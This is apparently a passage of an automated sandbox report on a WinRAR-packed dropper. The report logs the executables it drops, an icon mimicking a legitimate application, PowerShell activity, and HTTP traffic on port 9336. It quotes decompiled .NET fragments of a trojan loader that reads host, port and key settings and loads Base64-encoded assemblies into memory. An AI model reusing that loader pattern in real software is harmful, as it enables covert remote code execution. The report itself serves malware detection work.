Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File opened: C:\Windows\SysWOW64\riched32.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations Jump to behavior
Source: Ekpb7jn7mf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: calc.pdbGCTL source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
Source: Binary string: calc.pdb source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Ekpb7jn7mf.exe

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: YsrQekGS.exe.0.dr, Messages.cs .Net Code: Memory
Binary contains a suspicious time stamp
Source: rKPaQokQ.exe.0.dr Static PE information: 0x8F598A9E [Sun Mar 18 18:21:18 2046 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004254C5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 0_2_004254C5
File is packed with WinRar
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6674281 Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041F891 push ecx; ret 0_2_0041F8A4
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041A250 push eax; ret 0_2_0041A26E
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B2727F2 pushad ; ret 4_2_00007FFD9B2727F9
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B272ACD push ecx; retf 4_2_00007FFD9B272AE6
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B279E0D push ebx; ret 4_2_00007FFD9B279E6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD9B18D2A5 pushad ; iretd 10_2_00007FFD9B18D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD9B372316 push 8B485F92h; iretd 10_2_00007FFD9B37231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B19D2A5 pushad ; iretd 13_2_00007FFD9B19D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B2B23CD pushad ; retf 13_2_00007FFD9B2B23F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B2BC2C5 push ebx; iretd 13_2_00007FFD9B2BC2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B382316 push 8B485F91h; iretd 13_2_00007FFD9B38231B
Drops PE files
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Jump to dropped file
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Jump to dropped file
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (31).png
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 9336
Source: unknown Network traffic detected: HTTP traffic on port 9336 -> 49738
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
